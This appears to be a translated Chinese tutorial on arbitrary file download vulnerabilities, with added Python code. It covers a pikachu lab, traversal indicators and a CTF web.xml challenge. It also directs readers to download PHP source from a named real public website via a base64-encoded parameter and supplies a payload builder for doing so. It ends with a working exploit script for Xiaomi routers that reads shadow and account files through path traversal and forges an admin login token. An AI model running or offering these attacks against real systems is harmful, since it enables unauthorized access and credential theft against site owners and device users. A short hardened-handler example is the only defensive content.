Through an arbitrary file download you can pull the target site's database configuration file or other site information files, which is a big help for the rest of the penetration test!
File download
Target range environment: pikachu
Right-click an image link and view it
http://172.21.22.23:88/vul/unsafedownload/execdownload.php?filename=kb.png
http://172.21.22.23:88/vul/unsafedownload/execdownload.php?filename=ai.png
Change the value of filename to the PHP file one directory up
http://172.21.22.23:88/vul/unsafedownload/execdownload.php?filename=../execdownload.php
Request it and the file is downloaded
In the same way, look through the downloaded file for references to sensitive files and download those as well
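The traversal above in working code, as an added example (this is not the pikachu source): a minimal vulnerable download handler next to a hardened one, run against a constructed web root in a temporary directory. The layout is assumed to mirror pikachu's (images under vul/unsafedownload/download/, the script one level up, a config.inc.php at the root); the file names and contents are made up for the example.

```python
import os
import tempfile
from pathlib import Path

# Constructed stand-in for the web root so the example runs offline.
WEB_ROOT = Path(tempfile.mkdtemp(prefix="pikachu_"))
DOWNLOAD_DIR = WEB_ROOT / "vul" / "unsafedownload" / "download"
DOWNLOAD_DIR.mkdir(parents=True)
(DOWNLOAD_DIR / "kb.png").write_bytes(b"\x89PNG kb")
(DOWNLOAD_DIR / "ai.png").write_bytes(b"\x89PNG ai")
# The download script itself sits one level above the image directory.
(DOWNLOAD_DIR.parent / "execdownload.php").write_text("<?php /* handler source */ ?>")
# A hypothetical config file at the web root, the realistic target.
(WEB_ROOT / "config.inc.php").write_text("<?php $DB_PASS = 'secret'; ?>")


def vulnerable_download(filename: str) -> bytes:
    """Mirrors the bug: the user-supplied name is joined onto the download
    directory with no normalisation, so '../execdownload.php' walks out of it."""
    path = os.path.join(DOWNLOAD_DIR, filename)
    with open(path, "rb") as f:
        return f.read()


def hardened_download(filename: str) -> bytes:
    """Resolve the final path and require it to stay inside DOWNLOAD_DIR.
    Rejects traversal, absolute paths and NUL-byte truncation tricks."""
    if "\x00" in filename:
        raise ValueError("NUL byte in filename")
    base = DOWNLOAD_DIR.resolve()
    target = (base / filename).resolve()  # an absolute filename replaces base here
    if os.path.commonpath([base, target]) != str(base):
        raise ValueError(f"path escapes download directory: {filename!r}")
    if not target.is_file():
        raise FileNotFoundError(filename)
    return target.read_bytes()


def run_demo():
    """Returns what the vulnerable handler leaks and whether the hardened
    handler blocks each malicious name."""
    legit = vulnerable_download("kb.png")
    # The page's payload: one level up to the handler's own source.
    leaked_src = vulnerable_download("../execdownload.php")
    # Three levels up reaches the web root and the config file.
    leaked_cfg = vulnerable_download("../../../config.inc.php")
    blocked = []
    for name in ("../execdownload.php", "../../../config.inc.php",
                 "/etc/passwd", "kb.png\x00.txt"):
        try:
            hardened_download(name)
            blocked.append(False)
        except (ValueError, FileNotFoundError):
            blocked.append(True)
    return legit, leaked_src, leaked_cfg, blocked


if __name__ == "__main__":
    print(run_demo())
```

The check that matters is the one on the resolved path: prefix-matching the raw string, or stripping "../" once, is what the pikachu handler effectively fails to do, and both are bypassable.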
How to learn the site's directory structure:
Use a scanning tool such as the 御剑 (Yujian) directory scanner or Burp Suite;
as long as the wordlist is good enough, anything can be found!
Spotting it
From the parameter names and values:
- read.xxx?filename=
- down.xxx?filename=
- readfile.xxx?file=
- downfile.xxx?file=
- ../  ..\  .\  ./ and the like
- %00 ? %23 %20 . and the like
- &readpath=, &filepath=, &path=, &inputfile=, &url=, &data=, &readfile=,
- &menu=, META-INF, WEB-INF
Test site
Practice only, no damage!
https://www.znds.com/
Right-click, copy the link, and inspect it
http://down.znds.com/getdownurl/?s=L2Rvd24vMjAyMTA1MzEvdHhzcDE2MTU4XzcuNC4wLjEwMTBfZGFuZ2JlaS5hcGs=
After base64 decoding, the s parameter is:
http://down.znds.com/getdownurl/?s=/down/20210531/txsp16158_7.4.0.1010_dangbei.apk
If you replace the path after s with one of the site's PHP files, that file can be downloaded
When downloading, the parameter value after s must be base64-encoded again (it is encoding, not encryption)
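An added example (not from the page, and not the znds site's code) serving both the indicator list under "Spotting it" and the base64-wrapped s parameter above: it triages a URL's query string, decodes percent-encoded (including double-encoded) and base64 values, flags traversal markers, and rebuilds the URL with a replacement path in the same encoding the original used, so the server decodes it the way it did before. The URLs exercised are the page's own; the replacement path ../../index.php is hypothetical.

```python
import base64
import binascii
from urllib.parse import urlsplit, urlunsplit, unquote, quote

# Parameter names the page lists as typical of read/download endpoints.
SUSPECT_PARAMS = {"filename", "file", "readpath", "filepath", "path",
                  "inputfile", "url", "data", "readfile", "menu"}
# Traversal and truncation fragments, checked on the *decoded* value.
SUSPECT_FRAGMENTS = ("../", "..\\", "./", ".\\", "\x00", "META-INF", "WEB-INF")


def raw_query_pairs(query: str):
    """Split the query without decoding values, so single and double
    percent-encoding survive for inspection (parse_qsl would decode them)."""
    pairs = []
    for chunk in query.split("&"):
        if chunk:
            name, _, value = chunk.partition("=")
            pairs.append((unquote(name), value))
    return pairs


def decode_value(value: str):
    """Return (decoded_text, encoding) with encoding 'percent', 'base64' or
    'plain'. Percent-decoding runs twice to unwrap double encoding; a value
    that is valid base64 of printable ASCII (like znds's s=) counts as base64."""
    text = unquote(unquote(value))
    if text != value:
        return text, "percent"
    if len(value) >= 8:  # short plain names are too easily valid base64
        try:
            decoded = base64.b64decode(value, validate=True).decode("ascii")
            if decoded.isprintable():
                return decoded, "base64"
        except (binascii.Error, UnicodeDecodeError):
            pass
    return value, "plain"


def triage_url(url: str):
    """Every query parameter that looks like a file reference, with its
    decoded value, the encoding used, and any traversal markers present."""
    findings = []
    for name, value in raw_query_pairs(urlsplit(url).query):
        decoded, enc = decode_value(value)
        if name.lower() not in SUSPECT_PARAMS and "/" not in decoded and "\\" not in decoded:
            continue
        findings.append({
            "param": name,
            "value": decoded,
            "encoding": enc,
            "markers": [m for m in SUSPECT_FRAGMENTS if m in decoded],
        })
    return findings


def build_payload(url: str, param: str, new_path: str) -> str:
    """Rebuild url with param set to new_path, re-applying the encoding the
    original value used (base64 for znds-style endpoints, plain otherwise)."""
    parts = urlsplit(url)
    chunks = []
    for name, value in raw_query_pairs(parts.query):
        if name == param:
            _, enc = decode_value(value)
            if enc == "base64":
                value = quote(base64.b64encode(new_path.encode()).decode(), safe="=")
            else:
                value = quote(new_path, safe="/")
        chunks.append(f"{quote(name)}={value}")
    return urlunsplit(parts._replace(query="&".join(chunks)))


if __name__ == "__main__":
    znds = "http://down.znds.com/getdownurl/?s=L2Rvd24vMjAyMTA1MzEvdHhzcDE2MTU4XzcuNC4wLjEwMTBfZGFuZ2JlaS5hcGs="
    print(triage_url(znds))
    print(build_payload(znds, "s", "../../index.php"))
```

Keeping the encoding layer intact is the part people get wrong by hand: a raw ../ in s= is not a path to the znds handler, it is invalid base64.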
CTF challenge
Click Help and copy the link
filename=help.docx
Looks very much like a file download
In Java web development, file downloads are generally submitted via POST
Capturing the request confirms it is a Java web application
Since a Java web application has the WEB-INF/web.xml configuration file, request it as filename=WEB-INF/web.xml;
it downloads successfully; open it and get the flag!
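An added example that is not part of the challenge and goes a step beyond the page: once WEB-INF/web.xml is in hand, the next thing to download through the same filename= hole is usually the compiled servlet and filter classes it names, which live under WEB-INF/classes/<package path>/<Class>.class (the request method, GET or POST, does not change those paths). The web.xml below is constructed for the example and its class names are made up.

```python
import xml.etree.ElementTree as ET

# Constructed web.xml standing in for the one the challenge lets you download.
SAMPLE_WEB_XML = """<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="3.1">
  <servlet>
    <servlet-name>download</servlet-name>
    <servlet-class>com.example.ctf.DownloadServlet</servlet-class>
  </servlet>
  <servlet>
    <servlet-name>flag</servlet-name>
    <servlet-class>com.example.ctf.FlagServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>download</servlet-name>
    <url-pattern>/download</url-pattern>
  </servlet-mapping>
  <servlet-mapping>
    <servlet-name>flag</servlet-name>
    <url-pattern>/admin/flag</url-pattern>
  </servlet-mapping>
  <filter>
    <filter-name>auth</filter-name>
    <filter-class>com.example.ctf.AuthFilter</filter-class>
  </filter>
</web-app>
"""


def class_to_webinf_path(fqcn: str) -> str:
    """com.example.Foo -> WEB-INF/classes/com/example/Foo.class"""
    return "WEB-INF/classes/" + fqcn.replace(".", "/") + ".class"


def servlet_targets(web_xml: str):
    """For every class web.xml declares (servlets, filters, listeners) return
    its URL pattern if mapped, the class name, and the path to request next."""
    root = ET.fromstring(web_xml)
    # web.xml normally carries a default namespace; keep it on every lookup.
    ns = root.tag[: root.tag.index("}") + 1] if root.tag.startswith("{") else ""

    def t(tag):
        return ns + tag

    patterns = {}
    for m in root.iter(t("servlet-mapping")):
        patterns[m.findtext(t("servlet-name"))] = m.findtext(t("url-pattern"))

    targets = []
    for kind in ("servlet", "filter", "listener"):
        for el in root.iter(t(kind)):
            cls = el.findtext(t(kind + "-class"))
            if not cls:
                continue
            name = el.findtext(t(kind + "-name"))  # listeners have no name
            targets.append({
                "kind": kind,
                "url": patterns.get(name),
                "class": cls,
                "path": class_to_webinf_path(cls),
            })
    return targets


if __name__ == "__main__":
    for target in servlet_targets(SAMPLE_WEB_XML):
        print(f"{target['kind']:8} {str(target['url']):12} -> {target['path']}")
```

The .class files come back as bytecode; decompile them to find hard-coded secrets, the flag check, or further file paths. Filters are worth pulling too, since they are where authentication usually lives.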
File download vulnerability
Baidu Cup
Pretty hard!
https://www.ichunqiu.com/battalion?t=1&r=57475
Capture the login request
Change login to 1
Click manage, capture the request that is sent, and change login to 1
module is the site's module/framework parameter
This module involves a file download vulnerability; I'll leave it here for now, I don't know how to do it, I'll solve it later!
Xiaomi router arbitrary file download
https://www.seebug.org/vuldb/ssvid-98122
http://192.168.31.1/api-third-party/download/extdisks../etc/shadow
Enter /api-third-party/download/extdisks../etc/shadow directly after the site root
If the file comes back, the vulnerability is confirmed
Run the following with python3,
replacing the address inside with the target address and port
```python
import re
import time
import random
import hashlib
import requests

# Replace with the target router's address (and port, if not 80).
TARGET = "http://192.168.31.1"

# proxies = {"http": "http://127.0.0.1:8080"}  # route through Burp to inspect
proxies = {}


def get_mac():
    """The login page embeds the router's deviceId (its MAC); it is part of the nonce."""
    r0 = requests.get(TARGET + "/cgi-bin/luci/web", proxies=proxies)
    mac = re.findall(r'deviceId = \'(.*?)\'', r0.text)[0]
    return mac


def get_account_str():
    """Use the arbitrary file read to pull /etc/config/account, which holds the admin secret."""
    r1 = requests.get(TARGET + "/api-third-party/download/extdisks../etc/config/account",
                      proxies=proxies)
    print(r1.text)
    account_str = re.findall(r'admin\'? \'(.*)\'', r1.text)[0]
    return account_str


def create_nonce(mac):
    """Nonce format the login API expects: type_deviceId_timestamp_random."""
    type_ = 0
    deviceId = mac
    time_ = int(time.time())
    rand = random.randint(0, 10000)
    return "%d_%s_%d_%d" % (type_, deviceId, time_, rand)


def calc_password(nonce, account_str):
    """The login API checks sha1(nonce + account secret); we read the secret from the router."""
    m = hashlib.sha1()
    m.update((nonce + account_str).encode('utf-8'))
    return m.hexdigest()


mac = get_mac()
account_str = get_account_str()

## login, get stok
nonce = create_nonce(mac)
password = calc_password(nonce, account_str)
data = "username=admin&password={password}&logtype=2&nonce={nonce}".format(password=password, nonce=nonce)
r2 = requests.post(TARGET + "/cgi-bin/luci/api/xqsystem/login",
                   data=data,
                   headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0",
                            "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"},
                   proxies=proxies)
# print(r2.text)
stok = re.findall(r'"token":"(.*?)"', r2.text)[0]
print("stok=" + stok)
```
Get the stok value
Join the stok value onto the URL after a semicolon, as in /cgi-bin/luci/;stok=<value>/, and you are in